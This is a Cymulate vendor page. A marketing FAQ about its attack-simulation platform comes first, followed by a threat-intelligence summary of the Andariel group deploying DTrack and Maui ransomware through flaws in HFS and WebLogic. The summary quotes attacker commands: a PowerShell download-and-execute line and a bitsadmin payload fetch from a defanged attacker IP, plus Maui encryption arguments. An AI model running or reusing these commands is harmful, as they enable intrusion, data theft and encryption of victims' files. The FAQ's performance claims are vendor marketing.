Frequently Asked Questions

Threats & Incident Analysis

What is the Andariel group and how do they deploy DTrack and Maui ransomware?

The Andariel group is a threat actor known for deploying advanced malware such as DTrack and Maui ransomware. In documented incidents, Andariel used exploits to gain access to vulnerable servers, then deployed DTrack for information gathering and Maui ransomware for file encryption. The malware collects system and network information, exfiltrates data, and encrypts drives using specific command-line parameters. (Source: Original Webpage)

How does DTrack malware operate once deployed?

DTrack executes embedded shellcode to load a Windows in-memory payload, collects system information using Windows commands, and exfiltrates data to remote servers. It also collects browser history and copies stolen files to remote hosts on the same network. (Source: Original Webpage)

What are the technical details of Maui ransomware deployment?

Maui ransomware is deployed with parameters such as '-t' for thread count and '-x' for self-melt, targeting specific drives for encryption. It creates key files to implement file encryption and is often detected shortly after DTrack is deployed. (Source: Original Webpage)

How do attackers use PowerShell and bitsadmin in these incidents?

Attackers use PowerShell commands to download and execute additional scripts from remote servers. The bitsadmin utility is used to fetch and save malicious payloads, such as DTrack, to the victim's system for execution. (Source: Original Webpage)

What vulnerabilities did Andariel exploit to gain access?

Andariel exploited vulnerabilities in HFS (HTTP File Server) and Oracle WebLogic servers, including CVE-2017-10271, to gain initial access and execute malicious scripts. (Source: Original Webpage)

What is the impact of credential theft in these attacks?

Credential theft allows attackers to escalate privileges, deploy malware across networks, exfiltrate data, and potentially compromise additional systems within the organization. (Source: Original Webpage)

How does Cymulate help organizations validate resilience against ransomware like Maui?

Cymulate enables organizations to simulate ransomware attacks, including variants like Maui, to validate the effectiveness of their security controls, identify exploitable exposures, and prioritize remediation. The platform provides continuous threat validation and actionable insights to improve ransomware resilience. (Source: Knowledge Base, https://cymulate.com/solutions/optimize-threat-resilience/)

Where can I find guidance on becoming resilient to ransomware?

Cymulate provides a blog post outlining "7 Essential Steps to Becoming Ransomware Resilient." You can read it on our blog. (Source: Knowledge Base)

What types of cyber threats does the financial services sector face?

The financial services sector is targeted by sophisticated threats such as ransomware, phishing, and advanced persistent threats (APTs). Cymulate helps validate defenses against these threats. (Source: Knowledge Base, https://cymulate.com/customers/financial-services-cybersecurity-validation/)

Platform Features & Capabilities

What is Cymulate's Exposure Management Platform?

Cymulate's Exposure Management Platform is a unified solution that integrates Breach and Attack Simulation (BAS), Continuous Automated Red Teaming (CART), and Exposure Analytics. It enables organizations to proactively validate security controls, prioritize exposures, and improve operational efficiency. (Source: Knowledge Base, https://cymulate.com/platform/)

What types of threats can Cymulate validate?

Cymulate validates threats across the full kill chain, including phishing, malware, lateral movement, data exfiltration, and zero-day exploits, using daily updated threat templates and AI-generated attack plans. (Source: Knowledge Base, https://cymulate.com/solutions/optimize-threat-resilience/)

How does Cymulate's Threat Validation solution differ from manual pen tests and traditional BAS?

Cymulate's Threat Validation provides automated, continuous security testing with a library of over 100,000 attack actions aligned to MITRE ATT&CK and daily threat intelligence. Unlike manual pen tests or traditional BAS, Cymulate offers out-of-the-box integrations, automated mitigation, and actionable remediation. (Source: Knowledge Base)

What is threat exposure prioritization in cybersecurity?

Threat exposure prioritization is the process of identifying and ranking vulnerabilities based on their exploitability and impact on business-critical assets. Cymulate uses automated threat validation and exposure scoring to help teams focus on exposures not protected by security controls. (Source: Knowledge Base, https://cymulate.com/solutions/exposure-prioritization/)

How does Cymulate's 'Threat (IoC) updates' feature improve threat resilience?

The 'Threat (IoC) updates' feature provides recommended Indicators of Compromise (IoCs) that can be exported and applied to security controls, improving threat resilience by enabling rapid defense updates against new threats. (Source: Knowledge Base)

What are the key capabilities and benefits of Cymulate?

Cymulate offers continuous threat validation, unified platform integration, AI-powered optimization, complete kill chain coverage, attack path discovery, automated mitigation, cloud validation, and ease of use. Customers report measurable outcomes such as a 52% reduction in critical exposures, 60% increase in team efficiency, and 81% reduction in cyber risk within four months. (Source: Knowledge Base)

What integrations does Cymulate support?

Cymulate integrates with security technologies such as Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, CrowdStrike Falcon, Crowdstrike Falcon LogScale, and Cybereason. For a full list, visit our Partnerships and Integrations page. (Source: Knowledge Base)

How easy is Cymulate to implement and use?

Cymulate is praised for its intuitive, user-friendly interface and quick deployment. Customers report that implementation is fast, requiring only a few clicks, and the platform provides actionable insights with minimal resources. (Source: Knowledge Base, Customer Testimonials)

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across industries such as financial services, healthcare, retail, and more. It is suitable for organizations of all sizes, from small businesses to large enterprises. (Source: Knowledge Base)

What business impact can customers expect from using Cymulate?

Customers can expect a 30% improvement in threat prevention, 52% reduction in critical exposures, 60% increase in operational efficiency, 40X faster threat validation, 85% improvement in threat detection accuracy, and an 81% reduction in cyber risk within four months. (Source: Knowledge Base, https://cymulate.com/schedule-a-demo/)

What core problems does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volume, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers for CISOs. (Source: Knowledge Base)

How does Cymulate address persona-specific pain points?

Cymulate tailors solutions for CISOs (visibility, metrics), SecOps (efficiency, automation), red teams (scalability, adversarial simulation), and vulnerability management teams (prioritization, resource constraints). (Source: Knowledge Base)

What is the primary purpose of Cymulate's product?

The primary purpose is to harden defenses and optimize security controls by proactively validating controls, threats, and response capabilities, enabling organizations to focus on exploitable exposures and strengthen their security posture. (Source: Knowledge Base)

How does Cymulate support collaboration across security teams?

Cymulate fosters collaboration between SecOps, red teams, and vulnerability management teams by providing a unified platform for exposure validation, prioritization, and remediation. (Source: Knowledge Base)

Security & Compliance

What security and compliance certifications does Cymulate hold?

Cymulate holds SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1 certifications, demonstrating compliance with industry standards for security, privacy, and cloud services. (Source: Knowledge Base, https://cymulate.com/security-at-cymulate/)

How does Cymulate ensure data security and privacy?

Cymulate hosts services in secure AWS data centers, uses encryption for data in transit (TLS 1.2+) and at rest (AES-256), and follows a strict Secure Development Lifecycle (SDLC) with regular audits, vulnerability scanning, and third-party penetration tests. (Source: Knowledge Base)

Is Cymulate compliant with GDPR?

Yes, Cymulate incorporates data protection by design and has a dedicated privacy and security team, including a Data Protection Officer (DPO) and Chief Information Security Officer (CISO), ensuring GDPR compliance. (Source: Knowledge Base)

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers an industry-leading threat scenario library and AI-powered capabilities for workflow automation and security posture improvement. AttackIQ focuses on automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. Read more. (Source: Knowledge Base)

How does Cymulate differ from Mandiant Security Validation?

Mandiant is an original BAS platform but has seen little innovation in recent years. Cymulate continually innovates with AI and automation, expanding into exposure management and recognized as a grid leader. Read more. (Source: Knowledge Base)

What makes Cymulate different from Pentera?

Pentera focuses on attack path validation but lacks Cymulate's depth in defense optimization, offensive testing scalability, and exposure awareness. Cymulate provides a more comprehensive exposure validation platform. Read more. (Source: Knowledge Base)

How does Cymulate compare to Picus Security?

Picus may suit organizations seeking a BAS vendor with an on-prem option. Cymulate offers a more complete exposure validation platform covering the full kill chain and cloud control validation. Read more. (Source: Knowledge Base)

How does Cymulate compare to SafeBreach?

Cymulate outpaces SafeBreach with unmatched innovation, precision, and automation, featuring the industry’s largest attack library and a full CTEM solution. Read more. (Source: Knowledge Base)

How does Cymulate compare to Scythe?

Scythe is suitable for advanced red teams building custom attack campaigns. Cymulate provides a more comprehensive exposure validation platform with actionable remediation and automated mitigation. Read more. (Source: Knowledge Base)

How does Cymulate compare to NetSPI?

NetSPI excels in penetration testing as a service (PTaaS). Cymulate is designed for continuous, independent assessment and strengthening of defenses, recognized as a leader in exposure validation by Gartner and G2. Read more. (Source: Knowledge Base)

Pricing & Plans

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a detailed quote, schedule a demo with Cymulate's team. (Source: Knowledge Base)

Company Information & Trust

When was Cymulate founded and what is its global reach?

Cymulate was founded in 2016 and has a presence in 8 global locations, serving customers in 50 countries. Over 1,000 customers trust Cymulate's platform. (Source: Knowledge Base, https://cymulate.com/about-us/)

What is Cymulate's mission and vision?

Cymulate's mission is to revolutionize how companies approach cybersecurity by fostering a proactive stance against threats, empowering organizations to manage their security posture and improve resilience. (Source: Knowledge Base, https://cymulate.com/about-us/)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive design, ease of deployment, and actionable insights. Testimonials highlight the platform's user-friendly dashboard, fast implementation, and excellent support. (Source: Knowledge Base, Customer Testimonials)

New: 2026 Gartner® Market Guide for Adversarial Exposure Validation
Learn More
Cymulate named a Customers' Choice in 2025 Gartner® Peer Insights™
Learn More
New Research: The Security Tradeoffs Behind AI Tooling
Learn More
An Inside Look at the Technology Behind Cymulate
Learn More
Book a Demo
Book a Demo

Andariel deploys DTrack and Maui ransomware

August 11, 2022

Once this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands: "C:Windowssystem32cmd.exe" /c ipconfig /all > "%Temp%tempres.ip" "C:Windowssystem32cmd.exe" /c tasklist > "%Temp%temptask.list" "C:Windowssystem32cmd.exe" /c netstat -naop tcp > "%Temp%tempnetstat.res" "C:Windowssystem32cmd.exe" /c netsh interface show interface > "%Temp%tempnetsh.res" "C:Windowssystem32cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%tempping.res" "C:Windowssystem32cmd.exe" /c ipconfig /all > "%Temp%tempres.ip" "C:Windowssystem32cmd.exe" /c tasklist > "%Temp%temptask.list" "C:Windowssystem32cmd.exe" /c netstat -naop tcp > "%Temp%tempnetstat.res" "C:Windowssystem32cmd.exe" /c netsh interface show interface > "%Temp%tempnetsh.res" "C:Windowssystem32cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%tempping.res" In addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network. The Maui ransomware was detected ten hours after the DTrack variant on the same server. Multiple run parameters exist for the Maui ransomware. In this incident, analysts observe the actors using "-t" and "- x" arguments, along with a specific drive path to encrypt: C:WindowsTemptempbinMaui.exe -t 8 -x E: C:WindowsTemptempbinMaui.exe -t 8 -x E: In this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report. The malware created two key files to implement file encryption. Pivoting on the exfiltration information to the adjacent hosts, analysts discovered additional victims in India. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts. The primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data. This DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to Threat Intelligence customers. In one victim system, analysts discovered that a well-known simple HTTP server, HFS7, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server: C:windowssystem32WindowsPowershellv1.0powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1') C:windowssystem32WindowsPowershellv1.0powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1') The mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download /priority high "hxxp://145.232.235[.]222/usr/users/dwem.cert" "%appdata%microsoftmmcdwem.cert" bitsadmin.exe /transfer myJob /download /priority high "hxxp://145.232.235[.]222/usr/users/dwem.cert" "%appdata%microsoftmmcdwem.cert" The other victim operated a vulnerable Weblogic server. According to telemetry, the actor compromised this server via the CVE-2017-10271 exploit. Analysts saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server analysts mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1).er analysts mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1).

Featured Resources

View More Resources
Cymulate Stories: A Fireside Chat with Morgan Street Holdings
Webinar

Cymulate Stories: A Fireside Chat with Morgan Street Holdings

Many organizations still manage cyber risk using reactive security practices that struggle to keep pace with today’s threat landscape. As

Watch Now
The Race to Ship AI Tools Left Security Behind. Part 1: Sandbox Escape 
blog

The Race to Ship AI Tools Left Security Behind. Part 1: Sandbox Escape 

AI tools shipped fast - but weak sandboxing left escape paths, exposing systems to data access, abuse, and full compromise.

Read More
Exposure Validation: Continuous Testing Should Drive Continuous Improvement
blog

Exposure Validation: Continuous Testing Should Drive Continuous Improvement

What’s your end goal? How exactly does this security project make you more secure?  Like any technology initiative, those two

Read More